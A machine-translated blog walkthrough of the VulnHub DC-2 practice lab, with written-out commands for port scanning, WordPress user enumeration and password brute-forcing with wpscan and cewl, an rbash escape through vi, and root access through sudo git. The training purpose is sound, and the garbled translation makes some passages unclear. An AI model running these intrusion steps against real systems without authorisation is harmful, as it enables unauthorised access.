当前位置:网站首页>【Try to Hack】vulnhub DC2
【Try to Hack】vulnhub DC2
2022-06-29 14:40:00 【Happy star】
Blog home page : Happy star The blog home page of
Series column :Try to Hack
Welcome to focus on the likes collection ️ Leaving a message.
Starting time :2022 year 6 month 29 Japan
The author's level is very limited , If an error is found , Please let me know , thank !
Target aircraft knowledge points :
1、hosts file
2、dirb Scan directory
3、wpscan Enumerate user names
4、cewl Crawl password
5、ssh Service login
6、rbash The escape
7、git Raise the right

The first is the bridging mode
It should be noted that this range is not static IP, that 192.168.0.145 Just an example , Tell us how to set up hosts Of documents
Download the target as usual , It defaults to the bridge mode 
No need to change
kali The attacker also sets the bridge mode ( I did it like this )
netdiscover Host discovery
Because the target is not in bridge mode , And our kali It may not be in the same segment arp-scan -l Can only scan and kali Hosts in the same network segment 
This is our target plane , because VMare,Inc
Port scanning namp -sV -p- 192.168.0.131
80 Port open , visit 192.168.0.131
This is the result
According to the description of the topic at the beginning , Go set up hostsvim /etc/hosts

Successful visit 
Prompt us to use cewlwhatweb 192.168.0.131
yes wordpress
dirb http://192.168.0.131
Directory scanning 
http://192.168.0.131/wp-admin/
It may be backstage , Visit 
Is, indeed, , Account and password required
Now we use cewl Well
Crawling website content , Generate Dictionary
cewl dc-2 > dc-2.txt
This is the password dictionary
We use wpscan Get username wpscan --url http://dc-2 -e u

Save as user.txt
wpscan --url http://dc-2 --usernames user.txt --passwords dc-2.txt
use bp It's fine too 
Sign in jerry, Just look for it 

Remind us not to use wordpress A loophole in the

I thought I could write shell Of
Log in with two accounts and passwords ssh
ssh -p 7744 [email protected]192.168.0.131
ssh -p 7744 [email protected]192.168.0.131

Log in , Also found that flag3 了
But the command to read the file is ban 了
See what commands you can use
echo $PATH
echo /home/tom/usr/bin/*

vi flag3.txt
I saw it flag
see wp understand , Let's use it tom The user switches to jerry
Need to use su

rbash The escape
rbash With the general shell The difference is that it limits some behaviors , Make some commands impossible to execute .
【 Penetration test 】— rbash Brief description of escape methods
stay vi Of : You can put /bin/bash Copy to shellvi
Input ::set shell=/bin/sh
Input again ::shell
obtain shell 了
After the switch is completed, add environment variables . to $PATH Add two paths to the variable , Used to find commands
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/

succeed
Look for flag
Tips git
git Raise the right
Method 1
sudo git help config
!/bin/bash or !‘sh’
Method 2
sudo git -p help
!/bin/bash

边栏推荐
- Wechat applet: install B artifact and P diagram, modify wechat traffic main applet source code, Download funny joke diagram, make server free domain name
- 常用postgresql数据操作备忘:时间
- MySQL 数据库 - 通用语法 DDL DML DQL DCL
- 传输层 用户数据报协议(UDP)
- Persistence mechanism of redis
- .NET程序配置文件操作(ini,cfg,config)
- 第五届中国软件开源创新大赛 | openGauss赛道直播培训
- Redis为什么这么快?Redis是单线程还是多线程?
- 灵感收集·创意写作软件评测:Flomo、Obsidian Memo、Napkin、FlowUs
- leetcode:226. Flip binary tree
猜你喜欢

Goby full port scan

Stable currency risk profile: are usdt and usdc safe?

校园转转二手市场源码

Recruiting talents and seeking development | Jincang of the National People's Congress won the "best employer school recruitment case Award"
![[practical chapter of correlation analysis] why can't Bi software do correlation analysis](/img/f2/4f99deb63b1beffae90b8a1fb270d1.png)
[practical chapter of correlation analysis] why can't Bi software do correlation analysis

stm32 mbed 入门教程(四)---PWM

【关联分析实战篇】为什么 BI 软件都搞不定关联分析

Istio网格中访问外部服务方法

现场快递柜状态采集与控制系统

"Dead" Nokia makes 150billion a year
随机推荐
部署搭建decentraland流程讲解
Shell——文本处理命令
Why is redis so fast? Is redis single threaded or multi-threaded?
微信小程序:修复采集接口版云开发表情包
驱动器实际运用案例
揭秘!付费会员制下的那些小心机!
MySQL 数据库 - 通用语法 DDL DML DQL DCL
matplotlib直方图,柱状图
k8s部署redis哨兵
redis在window和Linux环境下的安装
你还在用命令看日志?快用 Kibana 吧,一张图胜过千万行日志
leetcode:226. Flip binary tree
Zhimeng dedecms resource material tutorial download website template source code (with mobile terminal) with installation tutorial
Redis哨兵机制原理详解
在同花顺上开户安全吗 开户在哪里申请
Redis' cache avalanche, cache breakdown, cache penetration, cache preheating, and cache degradation
【烹饪记录】--- 酸辣白菜
用手机在指南针上开户靠谱吗?这样炒股有没有什么安全隐患
Laravel - Composer 安装指定 Laravel 版本
3d立体相册,情人节,情侣生日礼物代码适用